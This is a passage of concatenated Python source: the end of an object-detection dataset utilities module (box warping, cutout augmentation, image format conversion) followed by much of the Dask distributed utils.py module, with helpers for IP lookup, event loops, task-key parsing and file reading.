xy = (xy @ M.T)[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# reject warped points outside of image
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
w = xy[:, 2] - xy[:, 0]
h = xy[:, 3] - xy[:, 1]
area = w * h
area0 = (targets[:, 3] - targets[:, 1]) * (targets[:, 4] - targets[:, 2])
ar = np.maximum(w / (h + 1e-16), h / (w + 1e-16)) # aspect ratio
i = (w > 4) & (h > 4) & (area / (area0 * s + 1e-16) > 0.2) & (ar < 10)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def cutout(image, labels):
# https://arxiv.org/abs/1708.04552
# https://github.com/hysts/pytorch_cutout/blob/master/dataloader.py
# https://towardsdatascience.com/when-conventional-wisdom-fails-revisiting-data-augmentation-for-self-driving-cars-4831998c5509
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def reduce_img_size(path='../data/sm4/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print('WARNING: image failure %s' % f)
def convert_images2bmp(): # from utils.datasets import *; convert_images2bmp()
# Save images
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
# for path in ['../coco/images/val2014', '../coco/images/train2014']:
for path in ['../data/sm4/images', '../data/sm4/background']:
create_folder(path + 'bmp')
for ext in formats: # ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
for f in tqdm(glob.glob('%s/*%s' % (path, ext)), desc='Converting %s' % ext):
cv2.imwrite(f.replace(ext.lower(), '.bmp').replace(path, path + 'bmp'), cv2.imread(f))
# Save labels
# for path in ['../coco/trainvalno5k.txt', '../coco/5k.txt']:
for file in ['../data/sm4/out_train.txt', '../data/sm4/out_test.txt']:
with open(file, 'r') as f:
lines = f.read()
# lines = f.read().replace('2014/', '2014bmp/') # coco
lines = lines.replace('/images', '/imagesbmp')
lines = lines.replace('/background', '/backgroundbmp')
for ext in formats:
lines = lines.replace(ext, '.bmp')
with open(file.replace('.txt', 'bmp.txt'), 'w') as f:
f.write(lines)
def recursive_dataset2bmp(dataset='../data/sm4_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='data/coco_64img.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new_folder'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
utils.py
import asyncio
import functools
import html
import importlib
import inspect
import json
import logging
import multiprocessing
import os
import pkgutil
import re
import shutil
import socket
import sys
import tempfile
import threading
import warnings
import weakref
import xml.etree.ElementTree
from asyncio import TimeoutError
from collections import OrderedDict, UserDict, deque
from concurrent.futures import CancelledError, ThreadPoolExecutor # noqa: F401
from contextlib import contextmanager, suppress
from hashlib import md5
from importlib.util import cache_from_source
from time import sleep
import click
import tblib.pickling_support
try:
import resource
except ImportError:
resource = None
import tlz as toolz
from tornado import gen
from tornado.ioloop import IOLoop
import dask
from dask import istask
# Import config serialization functions here for backward compatibility
from dask.config import deserialize as deserialize_for_cli # noqa
from dask.config import serialize as serialize_for_cli # noqa
# provide format_bytes here for backwards compatibility
from dask.utils import ( # noqa: F401
format_bytes,
format_time,
funcname,
parse_bytes,
parse_timedelta,
)
try:
from tornado.ioloop import PollIOLoop
except ImportError:
PollIOLoop = None # dropped in tornado 6.0
from .compatibility import PYPY, WINDOWS
from .metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
# For some reason this is required in python >= 3.9
if WINDOWS:
import multiprocessing.popen_spawn_win32
else:
import multiprocessing.popen_spawn_posix
logger = _logger = logging.getLogger(__name__)
no_default = "__no_default__"
def _initialize_mp_context():
if WINDOWS or PYPY:
return multiprocessing
else:
method = dask.config.get("distributed.worker.multiprocessing-method")
ctx = multiprocessing.get_context(method)
# Makes the test suite much faster
preload = ["distributed"]
if "pkg_resources" in sys.modules:
preload.append("pkg_resources")
from .versions import optional_packages, required_packages
for pkg, _ in required_packages + optional_packages:
try:
importlib.import_module(pkg)
except ImportError:
pass
else:
preload.append(pkg)
ctx.set_forkserver_preload(preload)
return ctx
mp_context = _initialize_mp_context()
def has_arg(func, argname):
"""
Whether the function takes an argument with the given name.
"""
while True:
try:
if argname in inspect.getfullargspec(func).args:
return True
except TypeError:
break
try:
# For Tornado coroutines and other decorated functions
func = func.__wrapped__
except AttributeError:
break
return False
def get_fileno_limit():
"""
Get the maximum number of open files per process.
"""
if resource is not None:
return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
# Default ceiling for Windows when using the CRT, though it
# is settable using _setmaxstdio().
return 512
@toolz.memoize
def _get_ip(host, port, family):
# By using a UDP socket, we don't actually try to connect but
# simply select the local address through which *host* is reachable.
sock = socket.socket(family, socket.SOCK_DGRAM)
try:
sock.connect((host, port))
ip = sock.getsockname()[0]
return ip
except EnvironmentError as e:
warnings.warn(
"Couldn't detect a suitable IP address for "
"reaching %r, defaulting to hostname: %s" % (host, e),
RuntimeWarning,
)
addr_info = socket.getaddrinfo(
socket.gethostname(), port, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP
)[0]
return addr_info[4][0]
finally:
sock.close()
def get_ip(host="8.8.8.8", port=80):
"""
Get the local IP address through which the *host* is reachable.
*host* defaults to a well-known Internet host (one of Google's public
DNS servers).
"""
return _get_ip(host, port, family=socket.AF_INET)
def get_ipv6(host="2001:4860:4860::8888", port=80):
"""
The same as get_ip(), but for IPv6.
"""
return _get_ip(host, port, family=socket.AF_INET6)
def get_ip_interface(ifname):
"""
Get the local IPv4 address of a network interface.
KeyError is raised if the interface doesn't exist.
    ValueError is raised if the interface does not have an IPv4 address
associated with it.
"""
import psutil
net_if_addrs = psutil.net_if_addrs()
if ifname not in net_if_addrs:
allowed_ifnames = list(net_if_addrs.keys())
raise ValueError(
"{!r} is not a valid network interface. "
"Valid network interfaces are: {}".format(ifname, allowed_ifnames)
)
for info in net_if_addrs[ifname]:
if info.family == socket.AF_INET:
return info.address
raise ValueError("interface %r doesn't have an IPv4 address" % (ifname,))
# FIXME: this breaks if changed to async def...
@gen.coroutine
def ignore_exceptions(coroutines, *exceptions):
"""Process list of coroutines, ignoring certain exceptions
>>> coroutines = [cor(...) for ...] # doctest: +SKIP
>>> x = yield ignore_exceptions(coroutines, TypeError) # doctest: +SKIP
"""
wait_iterator = gen.WaitIterator(*coroutines)
results = []
while not wait_iterator.done():
with suppress(*exceptions):
result = yield wait_iterator.next()
results.append(result)
raise gen.Return(results)
async def All(args, quiet_exceptions=()):
"""Wait on many tasks at the same time
Err once any of the tasks err.
See https://github.com/tornadoweb/tornado/issues/1546
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
return results
async def Any(args, quiet_exceptions=()):
"""Wait on many tasks at the same time and return when any is finished
Err once any of the tasks err.
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
break
return results
def sync(loop, func, *args, callback_timeout=None, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
callback_timeout = parse_timedelta(callback_timeout, "s")
# Tornado's PollIOLoop doesn't raise when using closed, do it ourselves
if PollIOLoop and (
(isinstance(loop, PollIOLoop) and getattr(loop, "_closing", False))
or (hasattr(loop, "asyncio_loop") and loop.asyncio_loop._closed)
):
raise RuntimeError("IOLoop is closed")
try:
if loop.asyncio_loop.is_closed(): # tornado 6
raise RuntimeError("IOLoop is closed")
except AttributeError:
pass
e = threading.Event()
main_tid = threading.get_ident()
result = [None]
error = [False]
@gen.coroutine
def f():
# We flag the thread state asynchronous, which will make sync() call
# within `func` use async semantic. In order to support concurrent
# calls to sync(), `asynchronous` is used as a ref counter.
thread_state.asynchronous = getattr(thread_state, "asynchronous", 0)
thread_state.asynchronous += 1
try:
if main_tid == threading.get_ident():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
future = func(*args, **kwargs)
if callback_timeout is not None:
future = asyncio.wait_for(future, callback_timeout)
result[0] = yield future
except Exception as exc:
error[0] = sys.exc_info()
finally:
assert thread_state.asynchronous > 0
thread_state.asynchronous -= 1
e.set()
loop.add_callback(f)
if callback_timeout is not None:
if not e.wait(callback_timeout):
raise TimeoutError("timed out after %s s." % (callback_timeout,))
else:
while not e.is_set():
e.wait(10)
if error[0]:
typ, exc, tb = error[0]
raise exc.with_traceback(tb)
else:
return result[0]
class LoopRunner:
"""
A helper to start and stop an IO loop in a controlled way.
Several loop runners can associate safely to the same IO loop.
Parameters
----------
loop: IOLoop (optional)
If given, this loop will be re-used, otherwise an appropriate one
will be looked up or created.
asynchronous: boolean (optional, default False)
If false (the default), the loop is meant to run in a separate
thread and will be started if necessary.
If true, the loop is meant to run in the thread this
object is instantiated from, and will not be started automatically.
"""
# All loops currently associated to loop runners
_all_loops = weakref.WeakKeyDictionary()
_lock = threading.Lock()
def __init__(self, loop=None, asynchronous=False):
current = IOLoop.current()
if loop is None:
if asynchronous:
self._loop = current
else:
# We're expecting the loop to run in another thread,
# avoid re-using this thread's assigned loop
self._loop = IOLoop()
else:
self._loop = loop
self._asynchronous = asynchronous
self._loop_thread = None
self._started = False
with self._lock:
self._all_loops.setdefault(self._loop, (0, None))
def start(self):
"""
Start the IO loop if required. The loop is run in a dedicated
thread.
If the loop is already running, this method does nothing.
"""
with self._lock:
self._start_unlocked()
def _start_unlocked(self):
assert not self._started
count, real_runner = self._all_loops[self._loop]
if self._asynchronous or real_runner is not None or count > 0:
self._all_loops[self._loop] = count + 1, real_runner
self._started = True
return
assert self._loop_thread is None
assert count == 0
loop_evt = threading.Event()
done_evt = threading.Event()
in_thread = [None]
start_exc = [None]
def loop_cb():
in_thread[0] = threading.current_thread()
loop_evt.set()
def run_loop(loop=self._loop):
loop.add_callback(loop_cb)
try:
loop.start()
except Exception as e:
start_exc[0] = e
finally:
done_evt.set()
thread = threading.Thread(target=run_loop, name="IO loop")
thread.daemon = True
thread.start()
loop_evt.wait(timeout=10)
self._started = True
actual_thread = in_thread[0]
if actual_thread is not thread:
# Loop already running in other thread (user-launched)
done_evt.wait(5)
if not isinstance(start_exc[0], RuntimeError):
if not isinstance(
start_exc[0], Exception
): # track down infrequent error
raise TypeError("not an exception", start_exc[0])
raise start_exc[0]
self._all_loops[self._loop] = count + 1, None
else:
assert start_exc[0] is None, start_exc
self._loop_thread = thread
self._all_loops[self._loop] = count + 1, self
def stop(self, timeout=10):
"""
Stop and close the loop if it was created by us.
Otherwise, just mark this object "stopped".
"""
with self._lock:
self._stop_unlocked(timeout)
def _stop_unlocked(self, timeout):
if not self._started:
return
self._started = False
count, real_runner = self._all_loops[self._loop]
if count > 1:
self._all_loops[self._loop] = count - 1, real_runner
else:
assert count == 1
del self._all_loops[self._loop]
if real_runner is not None:
real_runner._real_stop(timeout)
def _real_stop(self, timeout):
assert self._loop_thread is not None
if self._loop_thread is not None:
try:
self._loop.add_callback(self._loop.stop)
self._loop_thread.join(timeout=timeout)
with suppress(KeyError): # IOLoop can be missing
self._loop.close()
finally:
self._loop_thread = None
def is_started(self):
"""
Return True between start() and stop() calls, False otherwise.
"""
return self._started
def run_sync(self, func, *args, **kwargs):
"""
Convenience helper: start the loop if needed,
run sync(func, *args, **kwargs), then stop the loop again.
"""
if self._started:
return sync(self.loop, func, *args, **kwargs)
else:
self.start()
try:
return sync(self.loop, func, *args, **kwargs)
finally:
self.stop()
@property
def loop(self):
return self._loop
@contextmanager
def set_thread_state(**kwargs):
old = {}
for k in kwargs:
try:
old[k] = getattr(thread_state, k)
except AttributeError:
pass
for k, v in kwargs.items():
setattr(thread_state, k, v)
try:
yield
finally:
for k in kwargs:
try:
v = old[k]
except KeyError:
delattr(thread_state, k)
else:
setattr(thread_state, k, v)
@contextmanager
def tmp_text(filename, text):
fn = os.path.join(tempfile.gettempdir(), filename)
with open(fn, "w") as f:
f.write(text)
try:
yield fn
finally:
if os.path.exists(fn):
os.remove(fn)
def clear_queue(q):
while not q.empty():
q.get_nowait()
def is_kernel():
"""Determine if we're running within an IPython kernel
>>> is_kernel()
False
"""
# http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
if "IPython" not in sys.modules: # IPython hasn't been imported
return False
from IPython import get_ipython
# check for `kernel` attribute on the IPython instance
return getattr(get_ipython(), "kernel", None) is not None
hex_pattern = re.compile("[a-f]+")
@functools.lru_cache(100000)
def key_split(s):
"""
>>> key_split('x')
'x'
>>> key_split('x-1')
'x'
>>> key_split('x-1-2-3')
'x'
>>> key_split(('x-2', 1))
'x'
>>> key_split("('x-2', 1)")
'x'
>>> key_split("('x', 1)")
'x'
>>> key_split('hello-world-1')
'hello-world'
>>> key_split(b'hello-world-1')
'hello-world'
>>> key_split('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split(None)
'Other'
>>> key_split('x-abcdefab') # ignores hex
'x'
"""
if type(s) is bytes:
s = s.decode()
if type(s) is tuple:
s = s[0]
try:
words = s.split("-")
if not words[0][0].isalpha():
result = words[0].split(",")[0].strip("'(\"")
else:
result = words[0]
for word in words[1:]:
if word.isalpha() and not (
len(word) == 8 and hex_pattern.match(word) is not None
):
result += "-" + word
else:
break
if len(result) == 32 and re.match(r"[a-f0-9]{32}", result):
return "data"
else:
if result[0] == "<":
result = result.strip("<>").split()[0].split(".")[-1]
return result
except Exception:
return "Other"
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group('x')
>>> key_split_group('x-1')
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str:
if x[0] == "(":
return x.split(",", 1)[0].strip("()\"'")
elif len(x) == 32 and re.match(r"[a-f0-9]{32}", x):
return "data"
elif x[0] == "<":
return x.strip("<>").split()[0].split(".")[-1]
else:
return key_split(x)
elif typ is bytes:
return key_split_group(x.decode())
else:
return key_split(x)
@contextmanager
def log_errors(pdb=False):
from .comm import CommClosedError
try:
yield
except (CommClosedError, gen.Return):
raise
except Exception as e:
try:
logger.exception(e)
except TypeError: # logger becomes None during process cleanup
pass
if pdb:
import pdb
pdb.set_trace()
raise
def silence_logging(level, root="distributed"):
"""
Change all StreamHandlers for the given logger to the given level
"""
if isinstance(level, str):
level = getattr(logging, level.upper())
old = None
logger = logging.getLogger(root)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
old = handler.level
handler.setLevel(level)
return old
@toolz.memoize
def ensure_ip(hostname):
"""Ensure that address is an IP address
Examples
--------
>>> ensure_ip('localhost')
'127.0.0.1'
>>> ensure_ip('123.123.123.123') # pass through IP addresses
'123.123.123.123'
"""
# Prefer IPv4 over IPv6, for compatibility
families = [socket.AF_INET, socket.AF_INET6]
for fam in families:
try:
results = socket.getaddrinfo(
hostname, 1234, fam, socket.SOCK_STREAM # dummy port number
)
except socket.gaierror as e:
exc = e
else:
return results[0][4][0]
raise exc
tblib.pickling_support.install()
def get_traceback():
exc_type, exc_value, exc_traceback = sys.exc_info()
bad = [
os.path.join("distributed", "worker"),
os.path.join("distributed", "scheduler"),
os.path.join("tornado", "gen.py"),
os.path.join("concurrent", "futures"),
]
while exc_traceback and any(
b in exc_traceback.tb_frame.f_code.co_filename for b in bad
):
exc_traceback = exc_traceback.tb_next
return exc_traceback
def truncate_exception(e, n=10000):
""" Truncate exception to be about a certain length """
if len(str(e)) > n:
try:
return type(e)("Long error message", str(e)[:n])
except Exception:
return Exception("Long error message", type(e), str(e)[:n])
else:
return e
def validate_key(k):
"""Validate a key as received on a stream."""
typ = type(k)
if typ is not str and typ is not bytes:
raise TypeError("Unexpected key type %s (value: %r)" % (typ, k))
def _maybe_complex(task):
""" Possibly contains a nested task """
return (
istask(task)
or type(task) is list
and any(map(_maybe_complex, task))
or type(task) is dict
and any(map(_maybe_complex, task.values()))
)
def seek_delimiter(file, delimiter, blocksize):
"""Seek current file to next byte after a delimiter bytestring
This seeks the file to the next byte following the delimiter. It does
not return anything. Use ``file.tell()`` to see location afterwards.
Parameters
----------
file: a file
delimiter: bytes
a delimiter like ``b'\n'`` or message sentinel
blocksize: int
Number of bytes to read from the file at once.
"""
if file.tell() == 0:
return
last = b""
while True:
current = file.read(blocksize)
if not current:
return
full = last + current
try:
i = full.index(delimiter)
file.seek(file.tell() - (len(full) - i) + len(delimiter))
return
except ValueError:
pass
last = full[-len(delimiter) :]
def read_block(f, offset, length, delimiter=None):
"""Read a block of bytes from a file
Parameters
----------
f: file
File-like object supporting seek, read, tell, etc..
offset: int
Byte offset to start read
length: int
Number of bytes to read
delimiter: bytes (optional)
Ensure reading starts and stops at delimiter bytestring
If using the ``delimiter=`` keyword argument we ensure that the read
starts and stops at delimiter boundaries that follow the locations
``offset`` and ``offset + length``. If ``offset`` is zero then we
start at zero. The bytestring returned WILL include the
terminating delimiter string.
Examples
--------
>>> from io import BytesIO # doctest: +SKIP
>>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP
>>> read_block(f, 0, 13) # doctest: +SKIP
b'Alice, 100\\nBo'
>>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP
b'Alice, 100\\nBob, 200\\n'
>>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP
b'Bob, 200\\nCharlie, 300'
"""
if delimiter:
f.seek(offset)
seek_delimiter(f, delimiter, 2 ** 16)
start = f.tell()
length -= start - offset
f.seek(start + length)
seek_delimiter(f, delimiter, 2 ** 16)
end = f.tell()
offset = start
length = end - start
f.seek(offset)
bytes = f.read(length)
return bytes
@contextmanager
def tmpfile(extension=""):
extension = "." + extension.lstrip(".")
handle, filename = tempfile.mkstemp(extension)
os.close(handle)
os.remove(filename)
yield filename
if os.path.exists(filename):
try:
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
os.remove(filename)
except OSError: # sometimes we can't remove a generated temp file
pass
def ensure_bytes(s):
"""Attempt to turn `s` into bytes.
Parameters
----------
s : Any
        The object to be converted. Will correctly handle
* str
* bytes
* objects implementing the buffer protocol (memoryview, ndarray, etc.)
Returns
-------
b : bytes
Raises
------
TypeError
When `s` cannot be converted
Examples
--------
>>> ensure_bytes('123')
b'123'
>>> ensure_bytes(b'123')
b'123'
"""
if isinstance(s, bytes):
return s
elif hasattr(s, "encode"):
return s.encode()
else:
try:
return bytes(s)
except Exception as e:
raise TypeError(
"Object %s is neither a bytes object nor has an encode method" % s
) from e
def divide_n_among_bins(n, bins):
"""
>>> divide_n_among_bins(12, [1, 1])
[6, 6]
>>> divide_n_among_bins(12, [1, 2])
[4, 8]
>>> divide_n_among_bins(12, [1, 2, 1])
[3, 6, 3]
>>> divide_n_among_bins(11, [1, 2, 1])
[2, 6, 3]
>>> divide_n_among_bins(11, [.1, .2, .1])
[2, 6, 3]
"""
total = sum(bins)
acc = 0.0
out = []
for b in bins:
now = n / total * b + acc
now, acc = divmod(now, 1)
out.append(int(now))
return out
def mean(seq):
seq = list(seq)
return sum(seq) / len(seq)
def open_port(host=""):
"""Return a probably-open port
There is a chance that this port will be taken by the operating system soon
after returning from this function.
"""
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def import_file(path):
""" Loads modules for a file (.py, .zip, .egg) """
directory, filename = os.path.split(path)
name, ext = os.path.splitext(filename)
names_to_import = []
tmp_python_path = None
if ext in (".py",): # , '.pyc'):
if directory not in sys.path:
tmp_python_path = directory
names_to_import.append(name)
if ext == ".py": # Ensure that no pyc file will be reused
cache_file = cache_from_source(path)
with suppress(OSError):
os.remove(cache_file)
if ext in (".egg", ".zip", ".pyz"):
if path not in sys.path:
sys.path.insert(0, path)
names = (mod_info.name for mod_info in pkgutil.iter_modules([path]))
names_to_import.extend(names)
loaded = []
if not names_to_import:
logger.warning("Found nothing to import from %s", filename)
else:
importlib.invalidate_caches()
if tmp_python_path is not None:
sys.path.insert(0, tmp_python_path)
try:
for name in names_to_import:
logger.info("Reload module %s from %s file", name, ext)
loaded.append(importlib.reload(importlib.import_module(name)))
finally:
if tmp_python_path is not None:
sys.path.remove(tmp_python_path)
return loaded
class itemgetter:
"""A picklable itemgetter.
Examples
--------
>>> data = [0, 1, 2]
>>> get_1 = itemgetter(1)
>>> get_1(data)
1
"""
__slots__ = ("index",)
def __init__(self, index):
self.index = index
def __call__(self, x):
return x[self.index]
def __reduce__(self):
return (itemgetter, (self.index,))
def asciitable(columns, rows):
"""Formats an ascii table for given columns and rows.
Parameters
----------
columns : list
The column names
rows : list of tuples
The rows in the table. Each tuple must be the same length as
``columns``.
"""
rows = [tuple(str(i) for i in r) for r in rows]
columns = tuple(str(i) for i in columns)
widths = tuple(max(max(map(len, x)), len(c)) for x, c in zip(zip(*rows), columns))
row_template = ("|" + (" %%-%ds |" * len(columns))) % widths
header = row_template % tuple(columns)
bar = "+%s+" % "+".join("-" * (w + 2) for w in widths)
data = "\n".join(row_template % r for r in rows)
return "\n".join([bar, header, bar, data, bar])
def nbytes(frame, _bytes_like=(bytes, bytearray)):
""" Number of bytes of a frame or memoryview """
if isinstance(frame, _bytes_like):
return len(frame)
else:
try:
return frame.nbytes
except AttributeError:
return len(frame)
def is_writeable(frame):
"""
Check whether frame is writeable
Will return ``True`` if writeable, ``False`` if readonly, and
``None`` if undetermined.
"""
try:
return not memoryview(frame).readonly
except TypeError:
return None
@contextmanager
def time_warn(duration, text):
start = time()
yield
end = time()
if end - start > duration:
print("TIME WARNING", text, end - start)
def json_load_robust(fn, load=json.load):
""" Reads a JSON file from disk that may be being written as we read """
while not os.path.exists(fn):
sleep(0.01)
for i in range(10):
try:
with open(fn) as f:
cfg = load(f)
if cfg:
return cfg
except (ValueError, KeyError): # race with writing process
pass
sleep(0.1)
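# Note (added): json_load_robust blocks until ``fn`` exists, then retries parsing up to 10
# times; if every attempt fails it falls through and implicitly returns None.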
class DequeHandler(logging.Handler):
""" A logging.Handler that records records into a deque """
_instances = weakref.WeakSet()
def __init__(self, *args, n=10000, **kwargs):
self.deque = deque(maxlen=n)
super().__init__(*args, **kwargs)
self._instances.add(self)
def emit(self, record):
self.deque.append(record)
def clear(self):
"""
Clear internal storage.
"""
self.deque.clear()
@classmethod
def clear_all_instances(cls):
"""
Clear the internal storage of all live DequeHandlers.
"""
for inst in list(cls._instances):
inst.clear()
def reset_logger_locks():
"""Python 2's logger's locks don't survive a fork event
https://github.com/dask/distributed/issues/1491
"""
for name in logging.Logger.manager.loggerDict.keys():
for handler in logging.getLogger(name).handlers:
handler.createLock()
is_server_extension = False
if "notebook" in sys.modules:
import traitlets
from notebook.notebookapp import NotebookApp
is_server_extension = traitlets.config.Application.initialized() and isinstance(
traitlets.config.Application.instance(), NotebookApp
)
if not is_server_extension:
is_kernel_and_no_running_loop = False
if is_kernel():
try:
asyncio.get_running_loop()
except RuntimeError:
is_kernel_and_no_running_loop = True
if not is_kernel_and_no_running_loop:
# TODO: Use tornado's AnyThreadEventLoopPolicy, instead of class below,
# once tornado > 6.0.3 is available.
if WINDOWS and hasattr(asyncio, "WindowsSelectorEventLoopPolicy"):
# WindowsProactorEventLoopPolicy is not compatible with tornado 6
# fallback to the pre-3.8 default of Selector
# https://github.com/tornadoweb/tornado/issues/2608
BaseEventLoopPolicy = asyncio.WindowsSelectorEventLoopPolicy
else:
BaseEventLoopPolicy = asyncio.DefaultEventLoopPolicy
class AnyThreadEventLoopPolicy(BaseEventLoopPolicy):
def get_event_loop(self):
try:
return super().get_event_loop()
except (RuntimeError, AssertionError):
loop = self.new_event_loop()
self.set_event_loop(loop)
return loop
asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy())
@functools.lru_cache(1000)
def has_keyword(func, keyword):
return keyword in inspect.signature(func).parameters
@functools.lru_cache(1000)
def command_has_keyword(cmd, k):
if cmd is not None:
if isinstance(cmd, str):
try:
from importlib import import_module
cmd = import_module(cmd)
except ImportError:
raise ImportError("Module for command %s is not available" % cmd)
if isinstance(getattr(cmd, "main"), click.core.Command):
cmd = cmd.main
if isinstance(cmd, click.core.Command):
cmd_params = set(
[
p.human_readable_name
for p in cmd.params
if isinstance(p, click.core.Option)
]
)
return k in cmd_params
return False
# from bokeh.palettes import viridis
# palette = viridis(18)
palette = [
"#440154",
"#471669",
"#472A79",
"#433C84",
"#3C4D8A",
"#355D8C",
"#2E6C8E",
"#287A8E",
"#23898D",
"#1E978A",
"#20A585",
"#2EB27C",
"#45BF6F",
"#64CB5D",
"#88D547",
"#AFDC2E",
"#D7E219",
"#FDE724",
]
@toolz.memoize
def color_of(x, palette=palette):
h = md5(str(x).encode())
n = int(h.hexdigest()[:8], 16)
return palette[n % len(palette)]
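# Note (added): color_of hashes ``str(x)`` with md5, so the same input always maps to the
# same palette entry across runs and processes (deterministic colouring).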
@functools.lru_cache(None)
def iscoroutinefunction(f):
return inspect.iscoroutinefunction(f) or gen.is_coroutine_function(f)
@contextmanager
def warn_on_duration(duration, msg):
start = time()
yield
stop = time()
if stop - start > parse_timedelta(duration):
warnings.warn(msg, stacklevel=2)
def typename(typ):
"""Return name of type
Examples
--------
>>> from distributed import Scheduler
>>> typename(Scheduler)
'distributed.scheduler.Scheduler'
"""
try:
return typ.__module__ + "." + typ.__name__
except AttributeError:
return str(typ)
def format_dashboard_link(host, port):
template = dask.config.get("distributed.dashboard.link")
if dask.config.get("distributed.scheduler.dashboard.tls.cert"):
scheme = "https"
else:
scheme = "http"
return template.format(
